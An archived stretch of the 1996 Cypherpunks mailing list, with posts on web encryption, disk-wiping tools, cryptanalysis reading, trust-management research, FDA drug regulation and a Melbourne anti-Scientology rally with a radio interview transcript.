bonus) and more to do with the lack of table support.  (I needed something
to check out how pages would look on non-table supporting browsers.)

My concerns with S-HTTP are with the lack of server (and browser) software
support for it, as well as the difficulty of maintaining a site that uses
it.  (Having to change every single page on a site can become a bit of a
chore, as well as introduce unintended security holes due to in improperly
updated page.)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 16 Mar 1996 06:02:10 +0800
To: corey@hedgehog.mcom.com (Corey Bridges)
Subject: Re: Cypherpunks reference in Netscape book
In-Reply-To: <2.2.32.19960315083753.009c3b84@pdmail2.mcom.com>
Message-ID: <199603151846.NAA18536@homeport.org>
MIME-Version: 1.0
Content-Type: text


Corey Bridges wrote:

| I'm writing the "Encryption and SSL" chapter for the Netscape products, and
| I'm finishing it up with a "Further reading" section that lists
| crypto-related books, web sites, and newsgroups. I was thinking of including
| a reference to this mailing list.
| 
| Any strong opinions either way?

If you do so, point to the list archives on www.hks.net/cpunks and
give out the address of majordomo@toad.com over a warning about list
volume.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 16 Mar 1996 07:52:35 +0800
To: cypherpunks@toad.com
Subject: sector cleaning utility anywhere?
Message-ID: <9603151913.AA15304@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi.

I am using secdrive and also PCTools win 2.0

In the disk defragmenter of PCTools, I can choose DOD wipe to clear up free
sectors.

But I wondered if it wipes the trailing bits and sectors(?) at the end of a 
file in the end cluster?

Is there a standalone utility that would do this end-of-sector cleanup
like secure drive does, but that could do it on it's own without the need 
of any deletion?

JFA

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 16 Mar 1996 08:50:29 +0800
To: cypherpunks@toad.com
Subject: Re: How to use markov3 writing style changer? Origional URL?
In-Reply-To: <199603150239.SAA09261@netcom17.netcom.com>
Message-ID: <Pine.LNX.3.91.960315151413.207A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 14 Mar 1996, Dave Harman wrote:

> I've got the markov3 binary and source at:
> 
> ftp://ftp.netcom.com/pub/qu/qut/bin/markov3
> ftp://ftp.netcom.com/pub/qu/qut/src/markov3.6/
> 
> I downloaded it from a url that was posted here recently.
> 
> But I can't find instructions on how to run it.
> Can that URL be posted again or instructions on
> how to use markov3?

I assume you are refering to the post I made a while ago on the markov3
program.  The URL is http://www.voicenet.com/~markm/markov3.tar.gz .
The usage for the program is just: markov3 foo1.txt foo2.txt foo3.txt [etc]
where foo[0-9].txt are writing samples from your "victim."  The resulting
message is printed to standard output.  I think this is all covered in the
README file.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUnQ8bZc+sv5siulAQEngQP+INbJiUC6BS+3FvHuMZXH4jv59YKAp7t6
/oYZr3zkhSTYTabXViIvMDmDQMd0ssYC/6DiC66LFpHQG8hScVzGgmwpYxIMcTyn
+2anUkSS+2Wjs96BVmQV1od+9AS2I4LpPIYKf1XrtdBAhB+kVWXlGFpsmu9RoKEE
iv2l+GKGfBc=
=quTk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Sat, 16 Mar 1996 08:47:28 +0800
To: cypherpunks@toad.com
Subject: Source of Cryptanalysis Materials
Message-ID: <Pine.SCO.3.91.960315155002.23536A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


Some folks (this was awhile back) were looking for texts on cryptanalysis 
and related cryptographic topics.  Today, I ran across some stuff published 
by an outfit called "Aegean Park Press."  With such titles as "Manual for 
the Solution of Military Ciphers," "Elementary Military Cryptography," and 
"Cryptanalysis of Shift-Register Generated Stream Cipher Systems," they 
sound like a source of potentially interesting material.

A lot of what they are publishing are now-declassified military 
manuscripts, and they specialize in military-related historical stuff and 
crypto-related mathematics, etc.

A Web resource for them is at http://www.halcyon.com/books/

Otherwise, contact them at:

Aegean Park Press
P. O. Box 2837
Laguna Hills, CA 92654
VOX 714.586.8811
TF  800.736.3587 (US & Canada only)
FAX 714.586.8269

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Sat, 16 Mar 1996 08:05:33 +0800
To: sameer@atropos.c2.org
Subject: Re[2]: Cypherpunks reference in Netscape book
Message-ID: <9602158269.AA826932252@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     Sameer and Cory,
     
     Consider setting up some persistent html pages on cryptology, privacy, 
     cyphernomicon, cypherpunks list, and cypherpunks archives.  Include 
     these URL's as bookmarks with the delivered Netscape browser.  The 
     page on the cypherpunks list could have a subscribe (mail-to) button, 
     as well as some list nequitte, a product warning about list volume, 
     and an unsubscribe (mail-to) button.
     
     Martin G. Diehl


______________________________ Reply Separator _________________________________
Subject: Re: Cypherpunks reference in Netscape book
Author:  sameer@atropos.c2.org at INTERNET-USA
Date:    3/15/96 12:59 PM


 Make sure you list majordomo@toad.com and
cypherpunks-request@toad.com. Don't list cypherpunks@toad.com.
     
> I'm writing the "Encryption and SSL" chapter for the Netscape products, and 
> I'm finishing it up with a "Further reading" section that lists
> crypto-related books, web sites, and newsgroups. I was thinking of including 
> a reference to this mailing list.
> 
[snip]
> Corey Bridges
> Netscape Security Documentation
> http://home.netscape.com/people/corey 
> 415-528-2978
> 
     
     
-- 
Sameer Parekh     Voice:   510-601-9777x3 
Community ConneXion, Inc.   FAX:     510-601-9734
The Internet Privacy Provider   Dialin:  510-658-6376 
http://www.c2.org/ (or login as "guest")  sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sat, 16 Mar 1996 13:18:54 +0800
To: cypherpunks@toad.com
Subject: PolicyMaker paper available
Message-ID: <199603152107.QAA23226@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


A number of people have been asking me about some work I've been doing
(with Joan Feigenbaum and Jack Lacy) on alternatives to traditional
(X.509, PGP, etc.) identity-based certificates.  We've just finished
up our paper on the concept, "Decentralized Trust Management", to
appear at the Oakland Security Conference in May.

A PostScript pre-print is available in
     ftp://research.att.com/dist/mab/policymaker.ps

-matt

[NB: I no longer read the cypherpunks list with any regularity, so
please cc me directly on any comments or discussion.  Thanks.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 16 Mar 1996 08:15:09 +0800
To: jamesd@echeque.com
Subject: Re: FCC-type Regulation of Cyberspace
In-Reply-To: <199603151625.IAA21520@mail1.best.com>
Message-ID: <klGSI7i00YUv4VNsFc@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 15-Mar-96 Re: FCC-type Regulation of
.. by jamesd@echeque.com 
> Bill Frantz wrote:
> >Political speech, not commercial speech.  The act doesn't apply or is
> >unconstitutional.
>  
> I see:  The bill of rights reads: 
> "Congress shall make no law [...] abridging the freedom of *political*
> speech".   
> Never knew that until now. 

Thanks for clarifying. Now I know that Congress can pass a law muzzling
the New York Times Co., Inc.

More seriously, society accepts greater limitations on commercial
speech, and I don't find them nearly as odious as I do ones that
restrict political speech.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 16 Mar 1996 08:16:55 +0800
To: cypherpunks@toad.com
Subject: The Diamond Age (was Re: E$: Neal...)
Message-ID: <Pine.A32.3.91.960315161509.85587A-100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


*Mild spoiler warning*


   Asgaard wrote:
 
   >No. From this excerpt, I draw two conclusions:
   
   >1) The author is keeping up with some well known (at least
   >to longtime readers of the cp list) concepts of future
   >consequencies of information technology.
   
   He is. Stephenson's an occasional programmer and mentions a few cpunks 
   from Communities.com at the end of Snow Crash. He also throws in tasteful 
   renditions of old hat stuff like Turing machines (hardly the pinacle 
   of high tech processing power), and does a great job with an example 
   of parallel processing stolen from A Fire Upon the Deep (but *so* 
   much spicier!). Who would have thought sex orgies would be a model 
   for computation? Or ritual drumming as IPC...? I can just imagine a 
   unix kernel for such a machine...(or beast?)
   
   >2) Around these, he weaves a boring, artless plot.

   Actually the plot is rather well done and does not focus nearly as 
   much on tech Snow Crash did. It's more of a story-telling novel with some
   very cute literary devices. It's got to be the only children's book 
   I'd recommend to anyone, especially people you'd like to interest in 
   basic CS concepts or crypto-anonymity issues and who wouldn't be  
   caught dead reading sci-fi, much less cyberpunk. I don't consider it 
   to be a thriller (though it has more sex and violence than your average
   kid's book.). It was even a bit sentimental.

   Those of you who enjoy conclusive story resolution, will not like 
   Stephenson's open-ended finale (though *I* think he got it right 
   this time, unlike in Snow Crash).

   It has me wondering was what a real "Young Lady's Primer" complete with 
   gentle cartoonesque intros to CS, crypto (recreational crypto maybe?) 
   and chaumian concepts would invlolve. I do remember Phil Z. mentioning on 
   the list that his original exposure to crypto was as a child by just 
   such a book (he announced this the day the author died). I have heard of the 
   occasional video game that teaches assembler or typing, it might be 
   interesting to create and release such a thing on the net for the topics
   discussed among us (for all age groups). Anyone for a crypto-anarchy game 
   .wad?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 16 Mar 1996 02:07:25 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Neal Stephenson's geodesic economy
In-Reply-To: <v02120d18ad6e60032f75@[199.0.65.105]>
Message-ID: <Pine.HPP.3.91.960315170158.11643A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Mar 1996, Robert Hettinga wrote:

> Go buy this book.

No. From this excerpt, I draw two conclusions:

1) The author is keeping up with some well known (at least
   to longtime readers of the cp list) concepts of future
   consequencies of information technology.

2) Around these, he weaves a boring, artless plot.


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 16 Mar 1996 02:19:47 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer passphrases
In-Reply-To: <199603141930.LAA03089@netcom6.netcom.com>
Message-ID: <Pine.HPP.3.91.960315171558.11643B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Mar 1996, Bill Frantz wrote:

> Provided you insist on UNIX.  I still think rubber hoses will be the
> technique of choice.  That was what the Scientologists used on
> anon.penet.fi.

No, they used social engineering: Nice, honest Finnish policemen
were conned by well-dressed lawyers carrying papers written
in impressive legaleese. The policemen regretfully admitted that
afterwards.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 17 Mar 1996 17:15:03 +0800
To: gary@kampai.euronet.nl>
Subject: Re: Beat Remote Monitor Snooping?
Message-ID: <m0txlRT-00090rC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 3/16/96 GMT, John Lull wrote:
>On Thu, 14 Mar 1996 21:54:10 +0100, Gary Howland wrote:
>
>> NTSC (TV video) modulation is done by phase modulation of the 3.579545 MHz
>> subcarrier.
>
>This is not correct.  I'd suggest you go back and re-read your NTSC
>references.

If that's not correct, what is?  And it's been years since I read NTSC; I 
don't even know if I now have ready access to the information.  Merely 
saying that it's wrong isn't particularly informative, especially if you 
choose to copy it to the list.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexey Boldyrev <overlord@hp.novsu.ac.ru>
Date: Sat, 16 Mar 1996 16:32:36 +0800
To: cypherpunks@toad.com
Subject: Free News access
Message-ID: <314A2754.1291@hp.novsu.ac.ru>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know, how to get free online (not through FTP) Usenet News 
access?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 16 Mar 1996 22:28:27 +0800
To: cypherpunks@toad.com
Subject: Re: Venona NSA web page
Message-ID: <199603152345.SAA13692@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 16 Mar 1996 10:14:25 +0800
To: cypherpunks@toad.com
Subject: Re: Tim's friend's mildly retarded son
In-Reply-To: <Pine.HPP.3.91.960315172509.11643C-100000@cor.sos.sll.se>
Message-ID: <HyVukD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard <asgaard@sos.sll.se> writes:
> On Thu, 14 Mar 1996, Timothy C. May wrote:
>
> > Mexico has no FDA. A trip to the pharmacies of Tijuana is instructive. A
> > friend of mine was just here. On a business trip to SF and LA, he drove all
> > the way down to TJ to buy a "personal supply" of a nootropic drug for his
> > mildly-retarded son, a drug the FDA has not approved but which Mexicans and
> > Europeans have been buying for years. U.S. Customs, aware of such
> > tragedies, waves people through who are carrying "personal supplies" of
> > (non-narcotic) drugs.
>
> The reason FDA has not approved this drug is most probably because
> it does not make mildly retarded boys less retarded. But of course,
> it's not up to the state to protect people from wasting their money
> on snake oil. It becomes more difficult to uphold a pure market
> philosophy when it comes to poisonous snake oil or, as is often the
> case with potent drugs, effective oil but which will kill you from
> side effects after a delay. FDA has a very good reputation of not
> 'recommending' drugs with (delayed) adverse effects outweighing the
> beneficial ones.

This is not true. Today it costs hundreds of millions of dollars to bring a new
drug to the U.S. market. I speak from personal experience: my late mother used
to use Rowatinex to relieve kidney symptoms. It's widely available in Europe,
but the Irish manufacturer doesn't want to tell it here because the cost of
getting an FDA approval would be more than what they would make selling it.
Hence, it had to be smuggled in. :-)

Many over-the-counter drugs that became popular before the FDA probably could't
be brought to the market now.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 16 Mar 1996 15:36:53 +0800
To: cypherpunks@toad.com
Subject: Re: Tim's friend's mildly retarded son
In-Reply-To: <ad6e2a32100210041c3b@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.960315172509.11643C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Mar 1996, Timothy C. May wrote:

> Mexico has no FDA. A trip to the pharmacies of Tijuana is instructive. A
> friend of mine was just here. On a business trip to SF and LA, he drove all
> the way down to TJ to buy a "personal supply" of a nootropic drug for his
> mildly-retarded son, a drug the FDA has not approved but which Mexicans and
> Europeans have been buying for years. U.S. Customs, aware of such
> tragedies, waves people through who are carrying "personal supplies" of
> (non-narcotic) drugs.

The reason FDA has not approved this drug is most probably because
it does not make mildly retarded boys less retarded. But of course,
it's not up to the state to protect people from wasting their money
on snake oil. It becomes more difficult to uphold a pure market
philosophy when it comes to poisonous snake oil or, as is often the
case with potent drugs, effective oil but which will kill you from
side effects after a delay. FDA has a very good reputation of not
'recommending' drugs with (delayed) adverse effects outweighing the
beneficial ones. But what the hell, let the pharmaceutical companies
build up their own reputation. And let anyone call himself a medical
doctor (of School Medicine, Naprapathy, Healing, Zone Therapy, Quackery
or whatever). Most diseased persons will then carefully check the
mag strips on the gallipots with their pocket readers for the secret
key signatures of Abbot or Parke-Davis, and PDA-check the signatures of
Stanford or Harvard University on the doctors's digital diplomas (which
will include some physical descriptions) for authenticity. As usual,
lots of coming opportunities for reputation agencies and authentication
services.

Until this happens, trust FDA.


Asgaard







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 15 Mar 1996 18:55:50 +0800
To: cypherpunks@toad.com
Subject: Anti-scientology rally Melbourne Saturday the 16th of Match
Message-ID: <199603151011.UAA02671@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain



The suburbia.net administrators kindly invite you to attend to the
Church of Scientology Demonstration at:

	The Church of Scientology
	Corner of Fliners Lane and Russel St,
	Melbourne City [Australia]
	SATURDAY March the 16th 1996 11am to 1pm

For those completely unfamiliar with the Church of Scientology [CoS]'s
attack upon the Internet and RRR radio station and critical speech
generally, read my below summary and the the appended transcript of one
of our users [David Gerard <fun@suburbia.net>] from JJJ radio station.

The Church of Scientology was founded by the late L. Ron Hubbard in the
United States some 30 years ago. To followers, Hubbard is their profit,
and his prolific writings are the sacred word. The Church's hierarchy
and financial viability revolve around Hubburd's verbose scriptures.
Each new level gained by a church follower brings to them, among other
rights and privileges access to a new and previously verboten set of the
works of Ron.  But to the Church it brings something else. Revenue. A
very sizeable revenue. Ron's works are a required element in order for
the follower to progress through the many of successive levels the
Church has -- and they cost hundreds or thousands of dollars each. In
fact, by the time a devote of the Church has realized the highest OT
level, the Church has usually had them for over five figures. But
revenue isn't the only reason for keeping the works of Ron occulted
away.

A common technique used by cults to brainwash their followers is gradual
immersion in cult mythology and philosophy. To put it bluntly, it is
often advisable to keep the more wacko beliefs and practices out of your
new recruit's faces until they are sufficiently wacko themselves.  Now,
the problem for the Church of Scientology is that on the wacko scale the
higher level works of Ron hover somewhere near the figure 10. To an
outsider it is an immediate farse. But to a follower who has become
psychologically dependent on the Church's philosophy & society and
invested thousands and thousands of dollars in doing so, it is just
another step on the road to mental subservience.

What you have then is a Church based on brainwashing yuppies and other
people with more money than sense. This may not concern you. If Nicole
Kiddman, Kate Cerbrano, John Travolta, Burce Willis, Demi Moor and Tom
Cruise want to spend their fortunes on learning that the earth is in
reality the destroyed prison colony of aliens from out of space then so
be it. However, money brings power and attracts the currupt. Money is
something the Church has a lot of.  Not all of the Church's beliefs and
practices are so out of it as to be completely as irrelevant as the
previous example. Some are quite insidious. For instance, L. Ron Hubbard
devised a range of methods that could be used against critics and other
`enemies of the Church'. Among the list was manipulation of the
legal/court system. To the Church the battle isn't won in the court
room. It is won at the very moment the legal process starts unfolding,
creating fear and expense in those the Church opposes.  Their worst
critic at the moment is not a person, or an organisation but a medium --
the Internet. The Internet is, by its very nature a censorship free
zone. Censorship, concealment and revelation (for a fee) is the Church's
raison d'etre.

The Church, via its manipulation of the legal system has had computer
systems seized, system operators forced to reveal their users personal
details, university accounts suspended and radio stations, such as RRR
cut their programs. It has sued ex-cult members, newspapers, and many
others for copyright infringements, loss of earnings and trade secret
violation. Trade secret violation? Yes, the Church of Scientology
claims its religious works are trade secrets.

The fight against the Church is far more than the Net vs a bunch of
wackos with too much money. It is about corporate suppression of
the Internet and free speech. It is about intellectual property and
the big and rich versus the small and smart. The precedents the
Church sets today the weapons of corporate tirany tomorrow.

--Julian Assange (please direct replies to fun@suburbia.net)

   DAVID GERARD ON 3-CR (855KHZ AM) MELBOURNE, 8:50AM THU 14 MAR 1996
                                       
   
   ANNOUNCER: There's currently a war going on on the Internet,
   especially in relation to the Church of Scientology. This morning on
   the line is David Gerard. Good morning, David.

   DAVID: Good morning.

   A: First of all, can you tell me what, what the war is that's going
   on on the Internet?

   D: Well, OK. There's a newsgroup on the Internet called
   alt-dot-religion-dot-scientology, ARS. For a few years, this was like
   one of the thousands of backwater Internet newsgroups. A newsgroup's
   a sort of area with a given name where anyone can put a message on,
   read other people's messages, that sort of thing; it's distributed
   world-wide, there's no central control over it, so ...

   A: So it's sort of like an electronic noticeboard, where you can put
   up whatever you feel like.

   D: Yep. Free access. And, y'know, most of them are utter garbage and
   there's no way anyone's interested in all thousands of them. And it
   was like a little backwater religion newsgroup for many years, where
   you have a few Church people and a few critics sniping at each other,
   y'know, and no-one else was really interested. But then, there was an
   ex-Scientologist on there, a guy called Dennis Erlich, who ...
   Someone put on a message saying, "is this actually part of secret
   Scientology scripture?" It was a particularly wacky thing about 'find
   some plants and see If you can communicate with them and see if they
   receive your communication.' And he verified, 'yes, that's the real
   thing.' In verifying it, he quoted it. So what the Church of
   Scientology then did, seeing as they have tended in dealing with
   critics to have the subtlety of a Mack truck, what they did was, they
   got a judge to write a copyright violation writ. And they went round
   and raided his house, and took away his computers, and went through
   his house, and took anything they felt like. This is a good way to
   piss of thirty million people in one go. And the Internet sort of
   rose up as one to strike back at these people. So what happened was,
   in their attempts to quash all discussion and quash all criticism,
   they earned themselves a whole lot more critics. I mean, I'm not an
   ex-Scientologist, I have no interest in them, except that they're
   trying to use legal thuggery, corporate financing, to try to quash
   all dissent. Thankfully they're doing it very badly. They're losing
   cases left, right and centre when they get them into court, and the
   publicity has been very damaging for them.

   A: So there's obviously more than one legal case going on. How many
   people have they prosecuted, or how many people are they in the
   process of charging?

   D: Well, there was Dennis Erlich in America; Lawrence Wollersheim and
   Bob Penny, who are also ex- Scientologists -- they ran a computer
   bulletin-board called FACTNet, which contains information on all
   forms of cults and restrictive groups like those, and Arnie Lerma,
   who was an ex-Scientologist. And after Lerma was raided, someone in
   Holland put the thing which he had posted, the Fishman Affidavit,
   which contains quotes from the Scientology scriptures, someone in the
   Netherlands put it on a Web page -- on a World Wide Web page, the
   thing you get through Netscape and so on. And in magazines where you
   see the Internet, they usually have a screen shot from Netscape --
   and what happened was, they tried raiding the Internet provider in
   Holland, and the Dutch people were outraged with this and promptly
   there were a hundred different copies of it all over Holland. And
   then they tried mounting a case against them, and it just came in,
   word came in a few days ago that they lost.

   A: So is the Church of Scientology actually using the Internet to
   display information, or to put out information about the positive
   sides of the Church, or the sort of information that they would use
   to draw people in?

   D: Yeah, they finally got their own Web server up, but the point is
   ... And that's fine. The more information the better. The critics
   have their information up, and the Church is trying to stop that, but
   they're having a lot of trouble, because basically, once
   information's out there, you can't put the genie back in the bottle,
   you can't squeeze the toothpaste back into the tube. They feel that
   if people find out about their secret scriptures, they might think
   that they're very silly and laugh at them and not want to be
   Scientologists. And also when things like the prices of these things
   come out, like when you discover you've paid a hundred and sixty
   thousand US dollars to learn that Xenu the galactic dictator took
   people to Earth seventy-five million years ago, strapped them to
   volcanoes and blew them up, and that you've paid this much money for
   that and you're supposed to believe it.

   A: Well, you'd want to believe it after paying all that money.

   D: Well, actually, that's exactly it. The further people get in, the
   more fanatical they seem to be. Experts on cults say that the Church
   of Scientology is one of the hardest cults to get people back to the
   real world from. And you have that cognitive dissonance between 'this
   is a load of rubbish' and 'I've paid hundreds of thousands of dollars
   and worked for years for this.'

   A: Probably fits into the same philosophy that once you've paid a lot
   of money for a car, it's the best car there is. [laughs]

   D: Something like that. Yeah. And the issue goes beyond the Church of
   Scientology. I mean, they're weird and vicious, and this is
   well-documented, and if they care to object to me making that
   statement I'll back it up in court if they like ...

   A: Is this a fairly typical scenario on the Internet? Are there other
   groups who are behaving in this manner, or is it a fairly limited ...

   D: Well, at first only the Scientologists tried this, but, um, the
   Unification Church, Reverend Moon's lot, have recently been trying
   this, there's another small cult called Eckankar which is descended
   from a church which is descended from Scientology, have recently been
   trying this as well. It's quite amazing. It's not an issue of
   Scientology, it's not an issue of Scientology teachings, it's an
   issue of the corporate behaviour in the world where they attempt to
   silence critics by using legal bigfooting, money ... Can small people
   criticise big corporations or big financial interests?

   A: I guess in some ways it's very similar to the McDonalds case in
   Britain, where they're suing two unemployed people as this huge
   corporation.

   D: And the same thing is happening: it's backfiring on them.

   A: Yeah.

   D: 'Cos the thing about the Internet is, you can't stop the
   information going out, because if you make something restricted,
   suddenly everybody wants it. They've tried suing one person in
   Holland, a hundred more sprung up. They've tried getting their
   critics pulled off the Internet altogether -- my University Internet
   account was locked for two months because of the Church of
   Scientology, so I then went out and got a private provider. Their
   behaviour is ... it's intolerable in a multicultural society, where
   the implicit rule is we all have to get along.

   A: I understand that a similar thing has happened to the 'Liars'
   Club', a show put together by the Skeptics on 3-RRR.

   D: Yep. The Church spent about ... a few years trying to shut down
   the 'Liars' Club', 'cos they dared to mention, criticise Scientology.
   And they finally got it taken to the Australian Broadcasting
   Authority, who ruled that a particular show, where they had an
   ex-Scientologist called Cyril Vosper ... that he went on and he
   talked about the Church and what he didn't like about it and what was
   bad about it. And he knows his stuff, he's been there, he actually
   knew L. Ron Hubbard, that sort of thing.

   A: Is this L. Ron Hubbard the science fiction author?

   D: Yes, the guru of Scientology, the source of everything in
   Scientology. Every word he wrote is taken by them as scripture.

   A: [laugh] I've read his books and thought they were novels! [laughs]

   D: Ha, well, yeah, pretty well ... But anyway, Vosper went on, and
   the Tribunal ruled that no word or sentence that Vosper said was
   religious vilification, no word or sentence that Adam Joseph,
   presenter, said was vilification, no word or sentence that Vanda
   Hamilton, the other presenter, said was vilification, but, because
   the presenters agreed with the guest, it was therefore vilification.
   Now, they didn't ask RRR to pull the show, but RRR pulled the show.
   They also didn't give them any due process in pulling the show; if a
   show's in danger of being pulled, y'know, you give them the chance to
   speak. Stephen Walker just killed it.

   A: Actually, you're holding a demonstration, that's right.

   D: It's a small thing, where we politely state our case and hand out
   leaflets, it's outside the Church, corner Russell Street and Flinders
   Lane, on Saturday morning at 11am.

   A: So you'll be providing people who turn up with leaflets to hand
   out?

   D: Yep. We'll have hundreds of leaflets, we'll have a few signs ...
   We expect it to be a very polite demonstration. We had one in
   September last year, we politely stated our case, the Church people
   had a leaflet of their own, that sort of thing. It was ...

   A: [laughs] That's all very nice!

   D: It's all about ... It's not to do with the local people, I mean,
   the individual people are fine. We're talking about management
   actions in America. It's a multinational organisation.

   A: Anyway, we've got to go. Thanks very much for your time, David.

   D: Thank you very much.

   A: See you later. That was Dave Gerard talking about the war on the
   Internet and the way that the Church of Scientology is ... taking
   action against people who publish information which is negative about
   the Church. You've been listening to Thursday Breakfast, it's now two
   minutes past nine, we've gone over time, and we'll catch you again
   next week. It's time for 'Scheherazade'.

-- 
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Bulero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Sat, 16 Mar 1996 12:53:18 +0800
To: "'tcmay@got.net>
Subject: RE: Tim's friend's mildly retarded son
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960316041633Z-9242@red-06-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	tcmay@got.net

(In response to my sig statement):

>>>I hope I'm not the only one here who thinks so.
>
>How could you be? Since I was the one who cited the example, I clearly
>am
>opposed to the current monopoly on judgment the FDA enjoys.
....................................................................

Yes. I know.   I am on the infamous Anarcho-Capitalist Cypherpunk List. 
But I am sending mail from my place of work, and I intended it as a sort
of "disclaimer".  Ha-ha.  I wasn't clear about that.

BTW, vis-a-vis the Tijuana Free Market qua government involvement with
addicting substances, I think your precision statitics below are
apropos, Q.E.D.   :>)  *

>	.... Tobacco, which kills an estimated 400,000 a year is the
>	winner. (The statistics I saw a few years ago were easily memorizable:
>	tobacco: 400,000, alchohol: 40,000, drugs: 4,000.)


   ..
Blanc
* you would have had to read my "How to Win an Argument" post to
appreciate this one.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Mar 1996 07:32:30 +0800
To: cypherpunks@toad.com
Subject: RE: Tim's friend's mildly retarded son
Message-ID: <ad6f75c41302100402cd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:44 PM 3/15/96, Blanc Weber wrote:

>>The point is that it is not right to prevent, stifle, suffocate, the
>>liberty to use one's own resources, to act at one's own discretion and
>>make one's own choices in regard of one's own particular circumstance,
>>to make independently the judgements necessary to determine the truth
>>or falsehood of a statement, or the efficacy of a drug - i.e., it is
